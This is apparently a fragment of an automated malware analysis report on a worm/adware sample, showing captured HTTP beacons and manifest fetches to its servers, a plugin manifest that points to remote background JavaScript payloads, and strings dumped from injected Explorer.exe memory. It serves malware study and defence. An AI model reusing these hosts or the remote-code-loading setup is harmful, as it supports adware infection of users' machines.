GET /monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 HTTP/1.1

Host: logs.newstatsclientcloud.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:18 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1421058078.dop007.ny2.t,1421058078.cds053.ny2.c

GIF89a.............,...........D..;..

GET /plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsclientcloud.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:28 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1420713954"

Last-Modified: Thu, 08 Jan 2015 10:45:54 GMT

Cache-Control: max-age=895

Content-Length: 1679

Content-Type: text/xml; charset=UTF-8

X-HW: 1421058088.dop005.ny2.t,1421058088.cds005.ny2.c

<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>27</Ver>. <ShortName>Ge-Forces 1.1</ShortName>. <Description>Ge-Force</Description>. <PublisherName>iWebar</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newstatsdemosrv.com/plugin/apps/69129/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>1</BackgroundVer>. <Manifest>NA</Manifest>. <ChangePrevious>false&

<<< skipped >>>

GET /plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.newstatsclientcloud.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 12 Jan 2015 10:21:23 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1420713954"

Last-Modified: Thu, 08 Jan 2015 10:45:54 GMT

Cache-Control: max-age=900

Content-Length: 1679

Content-Type: text/xml; charset=UTF-8

X-HW: 1421058083.dop006.ny2.t,1421058083.cds005.ny2.pr

<<< skipped >>>

Map

The Worm connects to the servers at the folowing location(s):

Strings from Dumps

Explorer.EXE_2032_rwx_00E70000_00002000:

SHELL32.DLL

ShellExecuteA

KERNEL32.DLL

.rsrc

.text

Explorer.EXE_2032_rwx_00E80000_00001000:

|explorer.exeM_2032_